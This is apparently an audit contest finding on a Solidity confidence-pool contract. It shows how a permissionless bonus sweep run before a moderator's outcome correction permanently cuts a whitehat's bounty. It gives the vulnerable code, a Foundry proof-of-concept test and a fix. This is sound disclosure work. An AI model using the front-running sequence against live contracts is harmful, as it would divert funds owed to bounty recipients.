FoundrySolidityLayer 2
7.25 ETH
Submission Details
Impact: medium
Likelihood: medium

Permissionless bonus sweeps can permanently divert a corrected good-faith whitehat bounty to `recoveryAddress`

Author Revealed upon completion

Permissionless bonus sweeps can permanently divert a corrected good-faith whitehat bounty to recoveryAddress

Description

A moderator may re-flag an outcome before finality to correct an initially incorrect outcome or attacker address. For a good-faith CORRUPTED outcome, the named whitehat should receive the full pool snapshot: eligible stake plus bonus.

When no active-risk window was observed, an initial SURVIVED outcome makes all bonus unreserved. Anyone can call sweepUnclaimedBonus() to transfer the tracked bonus to recoveryAddress. The function deliberately leaves claimsStarted false, so the moderator may subsequently correct the outcome to good-faith CORRUPTED. However, that correction snapshots the now-reduced totalBonus, permanently excluding the swept bonus from the whitehat’s bounty.

function flagOutcome(PoolStates.Outcome newOutcome, bool goodFaith_, address attacker_) external onlyModerator {
// Re-flags remain allowed until claimsStarted becomes true.
if (outcome != PoolStates.Outcome.UNRESOLVED && claimsStarted) revert OutcomeAlreadySet();
// @> A corrected good-faith CORRUPTED outcome derives bounty from current accounting.
snapshotTotalStaked = totalEligibleStake;
snapshotTotalBonus = totalBonus;
bountyEntitlement = willBeGoodFaithCorrupted
? snapshotTotalStaked + snapshotTotalBonus
: 0;
}
function sweepUnclaimedBonus() external nonReentrant {
// No observed risk: bonus is unreserved under the preliminary SURVIVED outcome.
if (totalEligibleStake == 0 || riskWindowStart == 0) {
// @> Removes tracked bonus before a moderator may re-flag.
totalBonus -= amount <= totalBonus ? amount : totalBonus;
}
// @> The transfer moves value but intentionally does not set claimsStarted.
stakeToken.safeTransfer(recoveryAddress, amount);
}

Risk

Likelihood: Medium

  • A pool reaches terminal CORRUPTED without a successful pool interaction during the active-risk interval, leaving riskWindowStart equal to zero.

  • The moderator initially flags SURVIVED and uses the documented pre-claim correction path after receiving additional scope or good-faith information.

  • The sponsor, as recoveryAddress controller, or any permissionless caller observes the preliminary outcome and sweeps the unreserved tracked bonus before the correction transaction executes.

Impact: Medium

  • The recovery address receives the full bonus despite the corrected good-faith CORRUPTED outcome assigning that bonus to the named whitehat.

  • The whitehat’s bounty is permanently reduced by the swept bonus. The loss can equal the entire bonus pool and cannot be restored through any subsequent claim or sweep.

Proof of Concept

Create a new test file: test/unit/ConfidencePool.semantic.t.sol

Add the code below

// SPDX-License-Identifier: MIT
pragma solidity 0.8.26;
import {IAttackRegistry} from "@battlechain/interface/IAttackRegistry.sol";
import {PoolStates} from "src/libraries/PoolStates.sol";
import {BaseConfidencePoolTest} from "test/helpers/BaseConfidencePoolTest.sol";
/// @notice Business-logic regression tests derived from semantic state-machine review.
contract ConfidencePoolSemanticTest is BaseConfidencePoolTest {
function testPoC_bonusSweepFrontRunsGoodFaithCorrectionAndReducesWhitehatBounty() external {
_stake(alice, 100 * ONE);
_contributeBonus(carol, 50 * ONE);
// No interaction observes an active-risk state before the terminal corruption, so the
// initially flagged SURVIVED outcome leaves the entire bonus unreserved and sweepable.
attackRegistry.setAgreementState(IAttackRegistry.ContractState.CORRUPTED);
vm.prank(moderator);
pool.flagOutcome(PoolStates.Outcome.SURVIVED, false, address(0));
uint256 recoveryBefore = token.balanceOf(recovery);
vm.prank(bob);
pool.sweepUnclaimedBonus();
assertEq(token.balanceOf(recovery) - recoveryBefore, 50 * ONE, "bonus moved before correction");
assertFalse(pool.claimsStarted(), "sweep leaves the correction window open");
// The moderator uses the documented pre-claim correction path to record the actual
// good-faith CORRUPTED outcome, but the bounty snapshot now excludes the swept bonus.
vm.prank(moderator);
pool.flagOutcome(PoolStates.Outcome.CORRUPTED, true, attacker);
assertEq(pool.bountyEntitlement(), 100 * ONE, "whitehat entitlement lost the 50-token bonus");
vm.prank(attacker);
pool.claimAttackerBounty();
assertEq(token.balanceOf(attacker), 100 * ONE, "whitehat cannot recover swept bonus");
}
}

Run the test: forge test --match-test testPoC_bonusSweepFrontRunsGoodFaithCorrectionAndReducesWhitehatBounty -vvvv

Recommended Mitigation

Preserve the correction window for donation-only sweeps, but finalize the outcome whenever a sweep transfers tracked protocol bonus. This matches the documented value-movement finality rule.

function sweepUnclaimedBonus() external nonReentrant {
// ...
uint256 freeBalance = stakeToken.balanceOf(address(this));
uint256 amount = freeBalance > reserved ? freeBalance - reserved : 0;
if (amount == 0) revert NothingToSweep();
if (totalEligibleStake == 0 || riskWindowStart == 0) {
- totalBonus -= amount <= totalBonus ? amount : totalBonus;
+ uint256 trackedBonusSwept = amount <= totalBonus ? amount : totalBonus;
+ totalBonus -= trackedBonusSwept;
+
+ // A corrected outcome cannot honor a bounty for tracked bonus that
+ // has already left the pool.
+ if (trackedBonusSwept != 0) {
+ claimsStarted = true;
+ }
}
stakeToken.safeTransfer(recoveryAddress, amount);
}

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!